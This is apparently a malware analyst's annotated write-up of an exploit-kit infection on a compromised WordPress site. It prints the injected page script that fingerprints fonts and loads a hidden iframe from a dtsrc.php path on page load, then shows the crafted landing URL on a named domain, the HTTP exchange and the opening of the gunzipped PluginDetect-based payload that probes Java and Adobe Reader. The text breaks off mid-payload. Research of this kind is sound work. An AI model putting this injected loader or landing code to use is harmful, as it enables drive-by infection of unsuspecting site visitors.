- var hex_chr = '0123456789abcdef'.split('');
- function rhex(n) {
- var s = '', j = 0;
- for (; j < 4; j++)
- s += hex_chr[(n >> (j * 8 + 4)) & 0x0F]
- + hex_chr[(n >> (j * 8)) & 0x0F];
- return s;
- }
- function hex(x) {
- for (var i = 0; i < x.length; i++)
- x[i] = rhex(x[i]);
- return x.join('');
- }
- function md5(s) {
- return hex(md51(s));
- }
- function add32(a, b) {
- return (a + b) & 0xFFFFFFFF;
- }
- if (md5('hello') != '5d41402abc4b2a76b9719d911017c592') {
- function add32(x, y) {
- var lsw = (x & 0xFFFF) + (y & 0xFFFF),
- msw = (x >> 16) + (y >> 16) + (lsw >> 16);
- return (msw << 16) | (lsw & 0xFFFF);
- }
- }
- var Detector = function () {
- var baseFonts = ['monospace', 'sans-serif', 'serif'];
- var testString = "wwwmmmmmmmmmmlli";
- var testSize = '72px';
- var h = document.getElementsByTagName("body")[0];
- var s = document.createElement("span");
- s.style.fontSize = testSize;
- s.style.visibility = "hidden";
- s.innerHTML = testString;
- var defaultWidth = {};
- var defaultHeight = {};
- for (var index in baseFonts) {
- s.style.fontFamily = baseFonts[index] + ",'3x3'";
- h.appendChild(s);
- defaultWidth[baseFonts[index]] = s.offsetWidth;
- defaultHeight[baseFonts[index]] = s.offsetHeight;
- h.removeChild(s);
- }
- function detect(font) {
- var detected = false;
- for (var index in baseFonts) {
- s.style.fontFamily = ("'" + font + "'," + baseFonts[index]);
- h.appendChild(s);
- var matched = (s.offsetWidth != defaultWidth[baseFonts[index]] || s.offsetHeight != defaultHeight[baseFonts[index]]);
- h.removeChild(s);
- detected = detected || matched;
- }
- return detected;
- }
- this.detect = detect;
- };
- function getFonts() {
- var nFonts = document.getElementById("dlgHelper"),
- sHasFonts = "", numFonts = 0;
- if (typeof(nFonts.fonts) != 'object') {
- var checkFonts = ['3x3', '8514oem', 'AMS Euler', 'Abracadabra', 'Ad Lib', 'Adobe Jenson', 'Adobe Minion Cyrillic', 'Adobe Poetica', 'Adobe Text', 'Agency FB', 'Aharoni', 'Aisha', 'Akzidenz Grotesk', 'Albertus', 'Aldhabi', 'Aldus', 'Alexandria', 'Algerian', 'Allegro', 'Alpha Geometrique', 'Alphabetum', 'Amazone', 'American Text', 'American Typewriter', 'Amienne', 'Andalus', 'Andreas', 'Angsana New', 'AngsanaUPC', 'Anonymous', 'Anonymous Pro', 'Antiqua', 'Aparajita', 'Apex', 'Apple Chancery', 'Aptifer', 'Aquiline', 'Arabic Typesetting', 'Archer', 'Arial', 'Arial Black', 'Arial Hebrew', 'Arial Monospaced', 'Arial Narrow', 'Arial Rounded MT Bold', 'Arial Unicode MS', 'Aristocrat', 'Arno', 'Arnold Bテカcklin', 'Arnprior', 'Ashley Inline', 'Ashley Script', 'Aster', 'Astur', 'Athens', 'Attika', 'Aurora', 'Avant Garde Gothic', 'Avenir', 'Bagel', 'Balloon Pop Outlaw Black', 'Banco', 'Bank Gothic', 'Barmeno', 'Baskerville', 'Baskerville Old Face', 'Bastion', 'Batak Script', 'Batang', 'BatangChe', 'Bauer Bodoni', 'Bauhaus', 'Bauhaus 93', 'Baveuse', 'Beat', 'Bell', 'Bell Centennial', 'Bell Gothic', 'Bell MT', 'Bella Donna', 'Bembo', 'Bembo Schoolbook', 'Benguiat', 'Benguiat Gothic', 'Berkeley Old Style', 'Berlin Sans', 'Berlin Sans FB', 'Berlin Sans FB Demi', 'Bernard MT Condensed', 'Bernhard Modern', 'Berylium', 'Beteckna', 'Bickley Script', 'Biondi', 'Bitstream Cyberbit', 'Bitstream Vera', 'Blackadder ITC', 'Blue Highway', 'Blue Highway Condensed', 'Blue Highway D Type', 'Blue Highway Linocut', 'Bodoni', 'Bodoni MT', 'Bodoni MT Black', 'Bodoni MT Condensed', 'Bodoni MT Poster Compressed', 'Book Antiqua', 'Bookman', 'Bookman Old Style', 'Bookshelf Symbol 7', 'Boopee', 'Bordeaux Roman', 'Bradley Hand ITC', 'Braggadocio', 'Braille', 'Brandon Grotesque', 'Britannic Bold', 'Broadway', 'Browallia New', 'BrowalliaUPC', 'Brush Script', 'Brush Script MT', 'Burnstown Dam', 'Byington', 'CJK glyphs', 'Cabin', 'Cafeteria', 'Caflisch Script', 'Calibri', 'Calibri Light', 'Californian FB', 'Calisto', 'Calisto MT', 'Cambria', 'Cambria Math', 'Candara', 'Capitals', 'Carbon Block', 'Cartier', 'Caslon', 'Caslon Antique', 'Castellar', 'CatholicSchoolGirls Intl BB', 'Catriel', 'Catull', 'Centaur', 'Century', 'Century Gothic', 'Century Old Style', 'Century Schoolbook', 'Century Schoolbook Infant', 'Chalkboard', 'Chandas', 'Chaparral', 'Charcoal', 'Charis SIL', 'Cheltenham', 'Chicago', 'Chiller', 'Choc', 'Cholla Slab', 'Cinderella', 'City', 'Civitype', 'Clarendon', 'Clearface', 'Clearface Gothic', 'ClearlyU', 'Clearview', 'Cloister Black', 'Co Headline', 'Co Text', 'Cochin', 'Code2000', 'Code2001', 'Code2002', 'Codex', 'Colonna', 'Colonna MT', 'Comic Sans', 'Comic Sans MS', 'Commercial Pi', 'Compacta', 'Computer Modern', 'Concrete Roman', 'Consolas', 'Constantia', 'Continuum Medium', 'Cooper Black', 'Copperplate Gothic Bold', 'Copperplate Gothic Light', 'Corbel', 'Cordia New', 'CordiaUPC', 'Corel', 'Corona', 'Corsiva', 'Cottonwood', 'Courier', 'Courier New', 'CourierHP', 'CourierPS', 'Credit Valley', 'Critter', 'Cupola', 'Curlz', 'Curlz MT', 'Cyberbit', 'Cyrillic', 'Cテゥzanne', 'DFKai-SB', 'DaunPenh', 'David', 'Dax', 'DecoType Naskh', 'DejaVu Sans', 'DejaVu Sans Mono', 'DejaVu Serif', 'DejaVu fonts', 'Denmark', 'DilleniaUPC', 'Divona', 'DokChampa', 'Dom Casual', 'Dotum', 'DotumChe', 'Doulos SIL', 'Dragonwick', 'Droid', 'Droid Sans Mono', 'Dyslexie', 'ER Architekt', 'ER Bukinist', 'ER Kurier', 'ER Univers', 'Earwig Factory', 'Ebrima', 'Ecofont', 'Ecotype', 'Edwardian Script', 'Edwardian Script ITC', 'Egyptienne', 'Elephant', 'Ellington', 'Engravers MT', 'Eras', 'Eras Bold ITC', 'Eras Demi ITC', 'Eras Light ITC', 'Eras Medium ITC', 'Erler Dingbats', 'Espy Sans', 'Espy Serif', 'Estrangelo Edessa', 'EucrosiaUPC', 'Euphemia', 'Euphorigenic S', 'Eurocrat', 'Eurostile', 'Everson Mono', 'Everson Mono Unicode', 'Ex Ponto', 'Exablock', 'Excelsior', 'Excelsior Cyrillic Upright', 'Exocet', 'FB Reactor', 'FF Meta', 'FF Scala', 'FF Scala Sans', 'FIG Script', 'Fairfield', 'FangSong', 'Fedra Mono', 'Felix Titling', 'Fifteenth Century', 'Fixed', 'Fixedsys', 'Fixedsys Excelsior', 'Flama', 'Fontcraft Courier', 'Fontoon', 'Footlight', 'Footlight MT Light', 'Formata', 'Forte', 'Fraktur', 'FrankRuehl', 'Franklin Gothic', 'Franklin Gothic Book', 'Franklin Gothic Demi', 'Franklin Gothic Demi Cond', 'Franklin Gothic Heavy', 'Franklin Gothic Medium', 'Franklin Gothic Medium Cond', 'Free UCS Outline Fonts', 'FreeSans', 'FreeSerif', 'FreesiaUPC', 'Freestyle Script', 'French Script', 'French Script MT', 'Friz Quadrata', 'Frutiger', 'Frutiger Next', 'Futo Min A101', 'Futura', 'GNU Unifont', 'Gabriola', 'Gadugi', 'Garamond', 'Gautami', 'Geneva', 'Gentium', 'Georgia', 'Georgia Ref', 'Gigi', 'Gill Sans', 'Gill Sans MT', 'Gill Sans MT Condensed', 'Gill Sans MT Ext Condensed Bold', 'Gill Sans Schoolbook', 'Gill Sans Ultra Bold', 'Gill Sans Ultra Bold Condensed', 'Gisha', 'Gloucester', 'Gloucester MT Extra Condensed', 'Gotham', 'Gothic font', 'Goudy', 'Goudy Old Style', 'Goudy Pro Font', 'Goudy Schoolbook', 'Goudy Stout', 'Goudy Text', 'Grad', 'Granjon', 'Grasset typeface', 'Guardian Egyptian', 'Gulim', 'GulimChe', 'Gungsuh', 'GungsuhChe', 'HM Phonetic', 'Haettenschweiler', 'Hanacaraka', 'Handel Gothic', 'Harlow Solid', 'Harlow Solid Italic', 'Harrington', 'Heather', 'Heavy Heap', 'Hei', 'Heisei Kaku Gothic W5', 'Helvetica', 'Helvetica Cyrillic', 'Helvetica Greek', 'Helvetica Neue', 'Hercules', 'High Tower Text', 'Highway Gothic', 'Hiroshige', 'Hiroshige Sans', 'Hobo', 'Hoefler Text', 'Horizon', 'Humana Serif', 'Hurry Up', 'Huxtable', 'HyperFont', 'ITC Avant Garde Gothic', 'ITC Stone Sans', 'ITC Stone Serif', 'Impact', 'Imprint', 'Imprint MT Shadow', 'Inconsolata', 'Industria', 'Informal Roman', 'Interstate', 'Ionic No. 5', 'IrisUPC', 'Irregularis', 'Iskoola Pota', 'Janson', 'Japanese Gothic', 'JasmineUPC', 'Jefferson', 'Jenson', 'Jim Crow', 'Joanna', 'Johnston', 'Jokerman', 'Jomolhari', 'Juice', 'Juice ITC', 'Junicode', 'Kabel', 'Kahana', 'Kai', 'KaiTi', 'Kalinga', 'Kartika', 'Khmer UI', 'Kochi', 'KodchiangUPC', 'Kokila', 'Korinna', 'Kredit', 'Kristen', 'Kristen ITC', 'Kuenstler Script', 'Kunstler Script', 'Kursivschrift', 'Kyokasho ICA', 'LED', 'Lao UI', 'LastResort', 'Latha', 'Lato', 'Leelawadee', 'Legacy Sans', 'Legacy Serif', 'Letter Gothic', 'Levenim MT', 'Lexia', 'Lexia Readable', 'Lexicon', 'Liberation Mono', 'Liberation Sans', 'Liberation Serif', 'Ligurino', 'Ligurino Condensed', 'LilyUPC', 'Linux Libertine', 'Literaturnaya', 'Lithos', 'Lo Cicero Cherokee', 'Lo-Type', 'Lontara Script', 'Lucida Blackletter', 'Lucida Bright', 'Lucida Calligraphy', 'Lucida Console', 'Lucida Fax', 'Lucida Grande', 'Lucida Handwriting', 'Lucida Math', 'Lucida Sans', 'Lucida Sans Typewriter', 'Lucida Sans Unicode', 'Lucida Typewriter', 'MICR', 'MS Arial', 'MS Courier New', 'MS Georgia', 'MS Gothic', 'MS Gothic, MS PGothic', 'MS Mincho', 'MS Mincho, MS PMincho', 'MS Outlook', 'MS PGothic', 'MS PMincho', 'MS Reference Sans Serif', 'MS Reference Specialty', 'MS Sans Serif', 'MS Serif', 'MS Tahoma', 'MS Trebuchet', 'MS UI Gothic', 'MS Verdana', 'MT Extra', 'MV Boli', 'Magneto', 'Magnificat', 'Maiandra GD', 'Maiola', 'Malgun Gothic', 'Mangal', 'Marlett', 'Mathematical Pi', 'Matura MT Script Capitals', 'Megadeth', 'Meiryo', 'Meiryo UI', 'Melior', 'Memphis', 'Menlo', 'Microgramma', 'Microsoft Himalaya', 'Microsoft JhengHei', 'Microsoft JhengHei UI', 'Microsoft New Tai Lue', 'Microsoft PhagsPa', 'Microsoft Sans Serif', 'Microsoft Tai Le', 'Microsoft Uighur', 'Microsoft YaHei', 'Microsoft YaHei UI', 'Microsoft Yi Baiti', 'Miller', 'Minchナ・, 'MingLiU', 'MingLiU, PMingLiU', 'MingLiU-ExtB', 'MingLiU-ExtB, PMingLiU-ExtB', 'MingLiU_HKSCS', 'MingLiU_HKSCS-ExtB', 'Minion', 'Minion Web', 'Minya Nouvelle', 'Miriam', 'Miriam Fixed', 'Mistral', 'Modern', 'Modern No. 20', 'Mona', 'Mona Lisa', 'Monaco', 'Mongolian Baiti', 'Monofur', 'Monospace', 'Monotype Albion 70', 'Monotype Corsiva', 'Monotype Gill Sans 571', 'Monotype Urdu 507', 'MoolBoran', 'Morse Code', 'Motorway', 'Mrs Eaves', 'Mufferaw', 'Museo Sans', 'Museo Slab', 'Myanmar Text', 'Myriad', 'NPS Rawlinson Roadway', 'NSimSun', 'Narkisim', 'Nassim', 'Nastaliq Navees', 'Neacademia', 'Neuland', 'Neuropol', 'Neutraface', 'Neuzeit S', 'New Century Schoolbook', 'New Gulim and Dotum', 'New Johnston', 'New Peninim', 'New York', 'News 701', 'News 702', 'News 705', 'News 706', 'News Gothic', 'Niagara Engraved', 'Niagara Solid', 'Nilland', 'Nimbus Mono L', 'Nimbus Roman', 'Nimbus Sans L', 'Nina', 'Nirmala UI', 'Nu Sans', 'Nyala', 'OCR A Extended', 'OCR-A', 'OCR-B', 'Old English Text', 'Old English Text MT', 'Onyx', 'OpenSymbol', 'Optima', 'Orator', 'Ormaxx', 'Osaka Monospaced', 'PMingLiU', 'PMingLiU-ExtB', 'PT Sans', 'Palace Script', 'Palace Script MT', 'Palatino', 'Palatino Linotype', 'Papyrus', 'Parchment', 'Parisine', 'Park Avenue', 'Peignot', 'Perpetua', 'Perpetua Greek', 'Perpetua Titling MT', 'Planet Benson 2', 'Plantagenet Cherokee', 'Plantin', 'Plantin Schoolbook', 'Playbill', 'Poor Richard', 'Portobello', 'PragmataPro', 'Prestige', 'Prestige Elite', 'Pricedown', 'Prima Sans', 'Pristina', 'ProFont', 'Proggy Programming Fonts', 'Pupcat', 'Pythagoras', 'Raanana', 'Raavi', 'Rage Italic', 'Rail Alphabet', 'Ravie', 'Rawlinson Roadway', 'Renault', 'Requiem', 'Revue', 'RichStyle', 'Rockwell', 'Rockwell Condensed', 'Rockwell Extra Bold', 'Rod', 'Roman', 'Rotis Sans', 'Rotis Semi Serif', 'Rotis Serif', 'Rufscript', 'Ryumin Light-KL', 'STIX', 'Sabon', 'Sakkal Majalla', 'San Francisco', 'Sanvito', 'Scala', 'Scala Sans', 'Scribble', 'Script', 'Script MT Bold', 'Scriptina', 'Seagull', 'Segoe Print', 'Segoe Script', 'Segoe UI', 'Segoe UI Light', 'Segoe UI Semibold', 'Segoe UI Symbol', 'Segoe UI v5.00', 'Segoe UI v5.00 (top) and v5.27 (bottom)', 'Segoe UI v5.01', 'Segoe UI v5.27', 'Shelley Volante', 'Shin Go', 'Shonar Bangla', 'Showcard Gothic', 'Shruti', 'SimHei', 'SimKai', 'SimSun', 'SimSun-ExtB', 'Simplified Arabic', 'Simplified Arabic Fixed', 'Sistina', 'Skeleton Antique', 'Skia', 'Skolar', 'Skolar Devanagari', 'Small Fonts', 'Snap', 'Snap ITC', 'Snell Roundhand', 'Soupbone', 'Souvenir', 'Souvenir Gothic', 'Square 721', 'Stencil', 'Stereofidelic', 'Stone Informal', 'Stone Sans', 'Stone Serif', 'Studz', 'Sundanese Unicode', 'Sutturah', 'Swiss 721', 'Sybil Green', 'Sydnie', 'Sylfaen', 'Symbol', 'SymbolPS', 'Symbola', 'Syntax', 'System', 'Tahoma', 'Tai Le Valentinium', 'Talmud', 'Tandelle', 'Teen', 'Teen Light', 'TektonAlecko', 'Tema Cantante', 'Tema CantanteAndale Mono', 'Tempus Sans', 'Tempus Sans ITC', 'Tengwar', 'Terminal', 'Terminus', 'Tex Gyre Cursor', 'Tibetan Machine Uni', 'Times', 'Times New Roman', 'Tiresias', 'Titus Cyberbit Basic', 'TowerAbadi', 'Trade Gothic', 'Traditional Arabic', 'Trajan', 'Transport', 'Trebuchet', 'Trebuchet MS', 'Trinitテゥ', 'Trump Gothic', 'Trump Mediaeval', 'Tunga', 'Tw Cen', 'Tw Cen MT', 'Tw Cen MT Condensed', 'Tw Cen MT Condensed Extra Bold', 'Twentieth Century', 'Typiko New Era', 'UM Typewriter', 'URW++ Nimbus Sans Global', 'Ubuntu', 'Ubuntu Mono', 'Umbra', 'Unicode fallback font', 'Univers', 'Urdu Typesetting', 'Utopia', 'Utsaah', 'Vale Type', 'Vani', 'Velvenda Cooler', 'Vera Sans', 'Vera Sans Mono', 'Vera Serif', 'Verdana', 'Verdana Ref', 'Versailles', 'Vijaya', 'Viner Hand ITC', 'VirtueAmsterdam Old Style', 'Vivaldi', 'Vladimir Script', 'Vrinda', 'Wadalab', 'Waker', 'Wanted', 'Webdings', 'Wedding TextAegyptus', 'Weiss', 'Westminster', 'Wickenden Cafe NDP', 'Wide Latin', 'William MonospaceBalloon', 'Willow', 'Windsor', 'Wingdings', 'Wingdings 2', 'Wingdings 3', 'Wyld', 'XITS', 'XITSAlexandria', 'Y.OzFontN', 'Zapf Chancery', 'Zapf Dingbats', 'Zapf-Chancery', 'Zapfino', 'Zurich'],
- baseFonts = ['monospace', 'sans-serif', 'serif'];
- var out = "", det = new Detector();
- for (var i in checkFonts) {
- if (det.detect(checkFonts[i])) {
- sHasFonts += checkFonts[i];
- numFonts++;
- }
- }
- }
- else {
- var nFontLen = nFonts.fonts.count;
- for (i = 1; i < nFontLen + 1; i++) {
- sHasFonts += nFonts.fonts(i);
- numFonts++;
- }
- }
- //return numFonts + ":" + md5(sHasFonts);
- var nIF = document.createElement("iframe");
- nIF.width = 1;
- nIF.height = 1;
- nIF.style.visibility = 'hidden';
- nIF.src = "/wp-includes/pomo/dtsrc.php?a=h1&f=" + md5(sHasFonts) + (typeof encodeURIComponent != 'undefined' ? "&u=" + encodeURIComponent(window.navigator['userAgent']) : (typeof escape != 'undefined' ? "&u=" + escape(window.navigator['userAgent']) : window.navigator['userAgent'].replace(/(\t|\n|&|\?|)/g, " ") ));
- document.getElementsByTagName("body")[0].appendChild(nIF);
- }
- if (typeof(window.addEventListener) == 'undefined') {
- window.onload = getFonts;
- } else {
- window.addEventListener("load", getFonts);
- }
- </script>
- </head>
- <body>
- <OBJECT id="dlgHelper" CLASSID="clsid:3050f819-98b5-11cf-bb82-00aa00bdce0b" width="0px" height="0px"></OBJECT>
- </body>
- </html>
- // unixfreaxjp:
- // skipped the exploit part, and
- // see the below payload link to get the landing page....
- //
- nIF.src = "/wp-includes/pomo/dtsrc.php?a=h1&f="
- + md5(sHasFonts)
- + (typeof encodeURIComponent != 'undefined' ? "&u=" + encodeURIComponent(window.navigator['userAgent']) : (typeof escape != 'undefined' ? "&u=" + escape(window.navigator['userAgent']) : window.navigator['userAgent'].replace(/(\t|\n|&|\?|)/g, " ") ));
- // unixfreaxjp:
- // forming conditions:
- // pick any flavor of font provided and fire it up w/MD5
- $ echo Hercules|md5
- 51d0f9f5d6d2c5ff3ade4b38bb7c1ceb
- // unixfreaxjp:
- // more conditions (pickone)
- (typeof encodeURIComponent != 'undefined' ? "&u=" + encodeURIComponent(window.navigator['userAgent']) :
- (typeof escape != 'undefined' ? "&u=" + escape(window.navigator['userAgent']) :
- // unixfreaxjp:
- // And do ---> .replace(/(\t|\n|&|\?|)/g, " ") in the end. (replace strange chars wif space.. mostly unnecessary..)
- // unixfreaxjp:
- // assembled it, the result must've been a long dull URL
- // this E Kit is expected
- h00p://mahsms.ir/wp-includes/pomo/dtsrc.php?a=h1&f=51d0f9f5d6d2c5ff3ade4b38bb7c1ceb&u=Mozilla%2F5.0%20(Windows%3B%20U%3B%20MSIE%207.0%3B%20Windows%20NT%205.2)%20Java%2F1.5.0_08
- // Bingo.. Got the landing page!
- ---request begin---
- GET /wp-includes/pomo/dtsrc.php?a=h1&f=51d0f9f5d6d2c5ff3ade4b38bb7c1ceb&u=Mozilla%2F5.0%20(Windows%3B%20U%3B%20MSIE%207.0%3B%20Windows%20NT%205.2)%20Java%2F1.5.0_08 HTTP/1.1
- Referer: http://www.google.com
- User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Host: mahsms.ir
- Connection: Keep-Alive
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
- Keep-Alive: 300
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 200 OK
- Content-Encoding: gzip
- Vary: Accept-Encoding
- Date: Tue, 11 Mar 2014 02:08:04 GMT
- Server: LiteSpeed
- Connection: close
- X-Powered-By: PHP/5.2.17
- Content-Type: text/html
- // unixfreaxjp:
- // yes we got it; but remember, you get it only ONE TIME.. you may fail..change IP!!
- // remember to trail your reff
- -rwxr--r-- 1 14535 Mar 11 11:07 payload.gz*
- $ cp payload.gz payload-bak.gz
- $ gunzip payload.gz
- // unixfreaxjp:
- // HELLO PLUGIN DETECT! LONG TIME NO SEE! YOU GREW TALLER (IN VER)! :-)
- $ cat payload
- <html><head></head><body><script type='text/javascript'>/*PluginDetect v0.8.3www.pinlady.net/PluginDetect/license/[ getVersion hasMimeType onDetectionDone ][ Java AdobeReader ]*/var PluginDetect={version:"0.8.3",name:"PluginDetect",openTag:"<",isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,\-]*/,splitNumRegx:/[\.\_,\-]/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)?(d.isDefined(c)?new RegExp(c):d.getNumRegx).exec(b):null;return a?a[0]:null},compareNums:function(h,f,d){var e=this,c,b,a,g=parseInt;if(e.isStrNum(h)&&e.isStrNum(f)){if(e.isDefined(d)&&d.compareNums){return d.compareNums(h,f)}c=h.split(e.splitNumRegx);b=f.split(e.splitNumRegx);for(a=0;a<Math.min(c.length,b.length);a++){if(g(c[a],10)>g(b[a],10)){return 1}if(g(c[a],10)<g(b[a],10)){return -1}}}return 0},formatNum:function(b,c){var d=this,a,e;if(!d.isStrNum(b)){return null}if(!d.isNum(c)){c=4}c--;e=b.replace(/\s/g,"").split(d.splitNumRegx).concat(["0","0","0","0"]);for(a=0;a<4;a++){if(/^(0+)(.+)$/.test(e[a])){e[a]=RegExp.$2}if(a>c||!(/\d/).test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},getPROP:function(d,b,a){var c;try{if(d){a=d[b]}}catch(c){}return a},findNavPlugin:function(l,e,c){var j=this,h=new RegExp(l,"i"),d=(!j.isDefined(e)||e)?/\d/:0,k=c?new RegExp(c,"i"):0,a=navigator.plugins,g="",f,b,m;for(f=0;f<a.length;f++){m=a[f].description||g;b=a[f].name||g;if((h.test(m)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))||(h.test(b)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))){if(!k||!(k.test(m)||k.test(b))){return a[f]}}}return null},getMimeEnabledPlugin:function(k,m,c){var e=this,f,b=new RegExp(m,"i"),h="",g=c?new RegExp(c,"i"):0,a,l,d,j=e.isString(k)?[k]:k;for(d=0;d<j.length;d++){if((f=e.hasMimeType(j[d]))&&(f=f.enabledPlugin)){l=f.description||h;a=f.name||h;if(b.test(l)||b.test(a)){if(!g||!(g.test(l)||g.test(a))){return f}}}}return 0},getVersionDelimiter:",",findPlugin:function(d){var c=this,b,d,a={status:-3,plugin:0};if(c.DOM){c.DOM.initDiv()}if(!c.isString(d)){return a}if(d.length==1){c.getVersionDelimiter=d;return a}d=d.toLowerCase().replace(/\s/g,"");b=c.Plugins[d];if(!b||!b.getVersion){return a}a.plugin=b;a.status=1;return a},getPluginFileVersion:function(f,b){var h=this,e,d,g,a,c=-1;if(h.OS>2||!f||!f.version||!(e=h.getNum(f.version))){return b}if(!b){return e}e=h.formatNum(e);b=h.formatNum(b);d=b.split(h.splitNumRegx);g=e.split(h.splitNumRegx);for(a=0;a<d.length;a++){if(c>-1&&a>c&&d[a]!="0"){return b}if(g[a]!=d[a]){if(c==-1){c=a}if(d[a]!="0"){return b}}}return e},AXO:window.ActiveXObject,getAXO:function(a){var d=null,c,b=this;try{d=new b.AXO(a)}catch(c){};return d},INIT:function(){this.init.library(this)},init:{$:1,hasRun:0,objProperties:function(d,e,b){var a,c={};if(e&&b){if(e[b[0]]===1&&!d.isArray(e)&&!d.isFunc(e)&&!d.isString(e)&&!d.isNum(e)){for(a=0;a<b.length;a=a+2){e[b[a]]=b[a+1];c[b[a]]=1}}for(a in e){if(!c[a]&&e[a]&&e[a][b[0]]===1){this.objProperties(d,e[a],b)}}}},publicMethods:function(c,f){var g=this,b=g.$,a,d;if(c&&f){for(a in c){try{if(b.isFunc(c[a])){f[a]=c[a](f)}}catch(d){}}}},plugin:function(a,c){var d=this,b=d.$;if(a){d.objProperties(b,a,["$",b,"$$",a]);if(!b.isDefined(a.getVersionDone)){a.installed=null;a.version=null;a.version0=null;a.getVersionDone=null;a.pluginName=c}}},detectIE:function(){var init=this,$=init.$,doc=document,e,x,userAgent=navigator.userAgent||"",progid,progid1,progid2;$.isIE=eval("/*@cc_on!@*/!1");$.verIE=$.isIE?((/^(?:.*?[^a-zA-Z])??(?:MSIE|IE)\s*(\d+\.?\d*)/i).test(userAgent)?parseFloat(RegExp.$1,10):7):null;$.ActiveXEnabled=!1;$.ActiveXFilteringEnabled=!1;if($.isIE){try{$.ActiveXFilteringEnabled=window.external.msActiveXFilteringEnabled()}catch(e){}progid1=["Msxml2.XMLHTTP","Msxml2.DOMDocument","Microsoft.XMLDOM","TDCCtl.TDCCtl","Shell.UIHelper","HtmlDlgSafeHelper.HtmlDlgSafeHelper","Scripting.Dictionary"];progid2=["WMPlayer.OCX","ShockwaveFlash.ShockwaveFlash","AgControl.AgControl",];progid=progid1.concat(progid2);for(x=0;x<progid.length;x++){if($.getAXO(progid[x])){$.ActiveXEnabled=!0;if(!$.dbug){break}}}if($.ActiveXEnabled&&$.ActiveXFilteringEnabled){for(x=0;x<progid2.length;x++){if($.getAXO(progid2[x])){$.ActiveXFilteringEnabled=!1;break}}}}},detectNonIE:function(){var e=this,c=this.$,d=navigator,b=c.isIE?"":d.userAgent||"",f=d.vendor||"",a=d.product||"";c.isGecko=(/Gecko/i).test(a)&&(/Gecko\s*\/\s*\d/i).test(b);c.verGecko=c.isGecko?c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(b)?RegExp.$1:"0.9"):null;c.isChrome=(/(Chrome|CriOS)\s*\/\s*(\d[\d\.]*)/i).test(b);c.verChrome=c.isChrome?c.formatNum(RegExp.$2):null;c.isSafari=!c.isChrome&&((/Apple/i).test(f)||!f)&&(/Safari\s*\/\s*(\d[\d\.]*)/i).test(b);c.verSafari=c.isSafari&&(/Version\s*\/\s*(\d[\d\.]*)/i).test(b)?c.formatNum(RegExp.$1):null;c.isOpera=(/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(b);c.verOpera=c.isOpera&&((/Version\s*\/\s*(\d+\.?\d*)/i).test(b)||1)?parseFloat(RegExp.$1,10):null},detectPlatform:function(){var e=this,d=e.$,b,a=navigator.platform||"";d.OS=100;if(a){var c=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4,"iPhone",21.1,"iPod",21.2,"iPad",21.3,"Win.*CE",22.1,"Win.*Mobile",22.2,"Pocket\\s*PC",22.3,"",100];for(b=c.length-2;b>=0;b=b-2){if(c[b]&&new RegExp(c[b],"i").test(a)){d.OS=c[b+1];break}}}},library:function(c){var e=this,d=document,b,a;c.init.objProperties(c,c,["$",c]);for(a in c.Plugins){c.init.plugin(c.Plugins[a],a)}e.publicMethods(c.PUBLIC,c);c.win.init();c.head=d.getElementsByTagName("head")[0]||d.getElementsByTagName("body")[0]||d.body||null;e.detectPlatform();e.detectIE();e.detectNonIE();c.init.hasRun=1}},ev:{$:1,handler:function(c,b,a){return function(){c(b,a)}},fPush:function(b,a){var c=this,d=c.$;if(d.isArray(a)&&(d.isFunc(b)||(d.isArray(b)&&b.length>0&&d.isFunc(b[0])))){a.push(b)}},callArray:function(a){var b=this,d=b.$,c;if(d.isArray(a)){while(a.length){c=a[0];a.splice(0,1);b.call(c)}}},call:function(d){var b=this,c=b.$,a=c.isArray(d)?d.length:-1;if(a>0&&c.isFunc(d[0])){d[0](c,a>1?d[1]:0,a>2?d[2]:0,a>3?d[3]:0)}else{if(c.isFunc(d)){d(c)}}}},PUBLIC:{getVersion:function(b){var a=function(h,e,d){var f=b.findPlugin(h),g,c;if(f.status<0){return null};g=f.plugin;if(g.getVersionDone!=1){g.getVersion(null,e,d);if(g.getVersionDone===null){g.getVersionDone=1}}c=(g.version||g.version0);c=c?c.replace(b.splitNumRegx,b.getVersionDelimiter):c;return c};return a},onDetectionDone:function(b){var a=function(j,h,d,c){var e=b.findPlugin(j),k,g;if(e.status==-3){return -1}g=e.plugin;if(!b.isArray(g.funcs)){g.funcs=[]};if(g.getVersionDone!=1){k=b.getVersion?b.getVersion(j,d,c):b.isMinVersion(j,"0",d,c)}if(g.installed!=-0.5&&g.installed!=0.5){b.ev.call(h);return 1}b.ev.fPush(h,g.funcs);return 0};return a},hasMimeType:function(b){var a=function(d){if(!b.isIE&&d&&navigator&&navigator.mimeTypes){var g,f,c,e=b.isArray(d)?d:(b.isString(d)?[d]:[]);for(c=0;c<e.length;c++){if(b.isString(e[c])&&/[^\s]/.test(e[c])){g=navigator.mimeTypes[e[c]];f=g?g.enabledPlugin:0;if(f&&(f.name||f.description)){return g}}}}return null};return a},z:0},codebase:{$:1,isDisabled:function(){var a=this,b=a.$;return b.ActiveXEnabled&&b.isIE&&b.verIE>=7?0:1},checkGarbage:function(d){var b=this,c=b.$,a;if(c.isIE&&d&&c.getPROP(d.firstChild,"object")){a=c.getPROP(d.firstChild,"readyState");if(c.isNum(a)&&a!=4){b.garbage=1;return 1}}return 0},emptyGarbage:function(){var a=this,b=a.$,c;if(b.isIE&&a.garbage){try{window.CollectGarbage()}catch(c){}a.garbage=0}},init:function(e){if(!e.init){var c=this,d=c.$,a,b;e.init=1;e.min=0;e.max=0;e.hasRun=0;e.version=null;e.L=0;e.altHTML="";e.span=document.createElement("span");e.tagA='<object width="1" height="1" style="display:none;" 